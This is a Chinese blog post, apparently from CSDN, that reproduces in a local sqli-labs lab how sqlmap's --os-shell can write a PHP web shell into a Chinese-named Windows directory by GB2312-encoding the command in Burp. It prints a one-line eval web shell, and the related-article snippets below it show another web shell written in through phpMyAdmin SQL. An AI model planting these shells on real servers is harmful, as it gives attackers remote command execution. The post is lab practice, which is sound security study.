sqlmap os shell中文路径问题

最新推荐文章于 2022-05-24 14:12:20 发布
最新推荐文章于 2022-05-24 14:12:20 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: tools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuuhh/article/details/119813317
版权
本文详细记录了如何在PHP环境中,通过SQL注入利用GB2312编码在Windows系统中文路径下成功创建文件的过程。作者首先尝试了常规方法失败,然后通过Burp Suite抓包并修改命令为GB2312编码,最终成功实现了文件的生成。此过程涉及SQLmap工具和sqli-labs靶场。
摘要由CSDN通过智能技术生成

问题

看了师傅文章MSSQL高权限注入写马至中文路径自己复现一下。

复现

环境:
win10
phpstudy
sqli-labs靶场

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-shell  --proxy http://127.0.0.1:8080

1
正常写带中文路径的,可以看到是失败的没有生成文件。
2
burp抓个包。
2

将命令GB2312编码,然后替换到burp上。

echo ^<?php @eval($_POST[x])?^> > D:\Software\phpStudy\PHPTutorial\WWW\中文\a.php

网址 在线工具
3

执行成功生成文件。
4

参考

https://forum.butian.net/share/166

GTA6
关注
专栏目录
从sql注入到getshell (内附sqlmapos-shell遇到中文路径的解决办法)
hackzkaq的博客
12-23 3783
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员——君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文章内容 尝试一下更改bti的值 试试直接用sqlmap跑 测试成功,存在sql注入 尝试参数 —os-shell 看看是否能拿到shell 成功getshell 但是我们执行命令默认都在’C:\Windows\system32’这个路径下 我们可以看到当我们执行e: 没有回显 再次执行chdi.
mysql osshell_sqlmap os-shell探索
weixin_42529366的博客
02-07 541
1 条件网站的绝对路径mysql进程有网站绝对路径的写权限mysql用户为rootmysql允许写[secure_file_priv]GPC关闭2 过程dvwa-low-sqli为例sqlmap -u "http://ip/vulnerabilities/sqli/?id=111&Submit=Submit#" --cookie='PHPSESSID=t875bj3h4imdvhk7vce...
路径写后门拿shell的一些姿势
weixin_30904593的博客
03-23 413
[PhpMyAdmin后台拿Shell]CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');select xiaoma1 from xiaoma INTO ...
千万不要写中文路径
liu11_11的博客
01-29 1169
千万不要写中文路径名今天找了半天的bug,Xcode报错缺少静态库,其实并没有,也不是searchPath的问题
--os-shell在MySQL可运行环境
m0_56214376的博客
05-24 671
发现一个网站有SQL注入,用SQLmap --OS-shell 连接不上,查了点资料,记录一下。 先说说--os-shell,--os-shell就是在你注入点写入两个shell文件,一个用来执行命令,另外一个是网站访问可以上传文件。 我查了一下,在<=MySQL5.7的版本需要开启一下secure_file_priv 这个参数用来限制数据导入和导出操作的效果, 如果这个参数设为一个目录名,MySQL服务只允许在这个目录执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创...
sqlmap (--os-shell)的使用
千寻的博客
11-04 9万+
第一步 搭建存在sql注入的网站 第二步 扫描注入点 python sqlmap.py -u "http://192.168.232.129/cms/show.php?id=33" --os-shell 第三步 选择网站的语言 第四步 输入网站的角度路径 第五步 查看权限
sqlmap默认输出路径的设置
YQ的博客
04-10 1万+
SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的。 但是刚安装完sqlmap后C:/Users/用户名/ 文件下是不存在.sqlmap这个文件夹的,需要使用sqlmap扫描一下网站,程序才会建立该文件夹。 设置sqlmap的默认输出路径很简单,执行如下命令: 在--output-dir后面输入想要导出的文件路径。 这样程序执行之后就
sqlmap mysql shell,sqlmap --os-shell执行原理(mysql篇)
weixin_34965737的博客
03-27 1376
sqlmap --os-shell执行原理对于mysql数据库来说,--os-shell的本质就是写入两个shell文件,其的一个可以让我们用来执行命令,而另外一个,如果在网站访问的话,可以让我们可以上传文件。说到写入shell,就要说一下两个限制条件,首先,我们需要知道上传文件的两个限制条件,首先我们要知道网站的绝对路径(我们的shell写入到哪里),然后要有导入导出的权限。导入导出的权限在m...
sqlmap os-shell原理
信安路上……
12-04 2664
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
sqlmap数据转中文字符串
刺客python
12-15 1635
sqlmap数据转中文字符串#coding=utf-8 #sqlmap中文字符串 str = '\xb3\xac\xbc\xb6\xc7\xbf\xb4\xf3\xcc\xab\xcf\xb2\xbb\xb6\xc1\xcb' b = repr(str) print unicode(eval(b),"gbk")
Sqlmap中文手册
热门推荐
若水斋
12-22 12万+
这是我自己翻译的Sqlmap1.1.10的中文手册。Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文。由于我英语学得很差,所以翻译地不好。基本上是意译,还加入了我自己的东西,和原文有较大差距。
sqlmap中文
cynthrial的博客
09-30 3704
参考文档:https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Download-and-update.html 下载更新 sqlmap基于python2的环境的,所以安装sqlmap之前首先需要配好python的环境,sqlmap的部分漏洞利用功能依赖于 Metasploit框架。你可以从这里获取Metasploit框...
sqlmap中文乱码解决办法
weixin_33809981的博客
10-08 2828
window平台dump出来的csv的库用notepad或者其他的编辑器打开正常Linux平台visqlmap.py在第二行添加-*-coding:utf-8-*- 转载于:https://blog.51cto.com/0x007/1561442...
shell脚本处理 路径中文和空格方法
aizhangque5011的博客
04-17 1732
OLDIFS=$IFS IFS=$'\n' #存放路径的变量在引用时都使用双引号括起来 "$VAR_PATH" #路径拼接时后续的旧不需要加双引号了"$VAR_PATH"/bin #如果用另一个变量存放路径变量值,再次使用时还是要用双引号 PATH_2="$VAR_PATH"/bin #use the PATH_2 echo "$PATH_2" IFS=$...
SQLMAP参数中文解说
收集盒 Book box
10-24 920
#HiRoot's Blog  Options(选项):  --version 显示程序的版本号并退出  -h, --help 显示此帮助消息并退出  -v VERBOSE 详细级别:0-6(默认为1)    Target(目标):  以下至少需要设置其一个选项,设置目标URL。    -d DIRECT 直接连接到数据库。  -u URL, --url=URL 目标URL。  -l LIST 
sqlmap中文乱码问题
u011500307的专栏
12-04 1万+
直接上代码了,在sqlmap找到 sqlmap.py文件,打开添加下面的代码: #-*-coding:utf-8-*- 如下图:
sqlmap绕过d盾_记一次sqlmap --os-shell getshell过程的坑
weixin_39900830的博客
12-05 1000
目标站点输入帅比' or 'a'='a 并随意输入一个密码,提示密码错误,就不多bb了直接sqlmap一把梭。来坑了来坑了,这个位置的注入死活没跑出来,可能的原因:1.我太菜 √2.站点为https然而我没有在数据包里面添加:443 × 登录系统后发现整个系统都是注入,随便找了个其他地方开始了注入……在host后面添加:443 host后面没加:443之前就一直没跑出来,并且sq...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值